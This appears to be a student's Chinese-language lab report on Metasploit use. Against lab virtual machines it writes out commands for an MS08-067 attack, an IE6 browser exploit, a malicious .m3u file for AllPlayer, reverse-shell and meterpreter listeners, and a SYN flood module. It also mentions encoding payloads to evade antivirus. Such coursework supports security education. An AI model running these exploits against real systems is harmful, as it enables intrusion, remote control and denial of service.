MSF基础应用

20175307 2020-4 《网络对抗技术》Exp6 MSF基础应用 Week10

一、实践目标

1、实践对象

Kali Linux
Metasploitable Linux
Windows 10
Windows 7
Windows XP

2、实践内容

• 成功主动攻击，如ms08-067
• 成功针对浏览器的攻击，如ms11-050
• 成功针对客户端的攻击，如Adobe
• 成功应用辅助模块的攻击

二、实践过程

1.主动攻击实践

（1）MS08-067漏洞渗透攻击实践（成功）

1.使用Nmap探测靶机的漏洞
nmap -sS -A --srcipt=smb-vuln-ms08-067 -PO 192.168.43.143

2.启动msfconsole查找漏洞
msfconsol进入msfconsol控制台
search ms08_067查看漏洞

3.查看可以使用的payload
show payloads
ms08_067 payloads
4.查看可以被攻击靶机的操作系统版本
show targets

5.设置攻击载荷和连接需要的参数
set payload generic/shell_reverse_tcp
set LHOST 192.168.43.132
set RHOST 192.168.43.144
set RPORT 5307
set LPORT 5307
exploit

6.出现Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.43.144:5307). 问题
更改回默认port，就可以了

7.开始入侵：
ipconfig/all命令查看当前电脑网卡的ip信息、DNS信息、DHCP服务器信息等

（2）浏览器的攻击（成功/唯一）

先通过msf搜索漏洞
search Internet
选择了MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
这个漏洞正好针对于Windows XP的IE6浏览器
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.144

成功反弹连接

（3）针对客户端的攻击----ALLPlayer 5.8.1 溢出漏洞（成功、唯一）

首先，我查看了cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat/下的已知客户端的漏洞攻击的rb文件。经过10几种攻击的尝试，最后通过allplayer_m3u_bof.rb 完成了针对客户端的攻击。

1.查看文档

vim allplayer_m3u_bof.rb

大致意思是在AllPlayer5.8.1版本上发现了一个对.m3u文件的溢出漏洞。并在win7 SCP1上可以很好的运行。

2.配置并生成m3u文件

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LpoRT 5307
set FILENAME 5307.m3u

3.靶机准备换机

首先在http://www.skycn.com/soft/appid/80.html下载ALLplayer5.8.1
安装之后，将攻击机的文件拷贝到靶机XP

4.Kali监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LPORT 5307
exploit

5.冲！

XP双击5307.m3u文件，Kali就获取到了shell，

（4）辅助模块攻击

采用的是dos/tcp模块下的synflood攻击，

设定了300个数据包
win7通过wireshark抓包，tcp连接正好从271到571

三、问题回答和感想

1.问题：用自己的话解释什么是exploit,payload,encode

• exploit 利用系统、程序或服务的漏洞进行攻击

• payload 攻击者在靶机上执行的一段代码，即载荷，该代码具有反弹连接、创建用户、执行其他系统命令的功能。

• encode 可以使载荷进行一个编码，躲过杀软的检测，以便获取更好的攻击效果。

2.感想：

为了完成本次实验，我煞费苦心，浏览了很多帮助文档。通过浏览每一个攻击的描述，我觉得在我们这个看似平和稳定的网络世界里，其实是暗藏杀机的，很多人想通过软件、系统、服务的漏洞去获取不应该属于他们的东西。这和创建这些系统、软件、服务的作者的初衷是背道而驰的，本来这些都是去帮助人们来更好的浏览这个世界，但是这些作品却因为作者的安全意识不强。而沦为了坏人手中的工具。我觉得挺可悲的。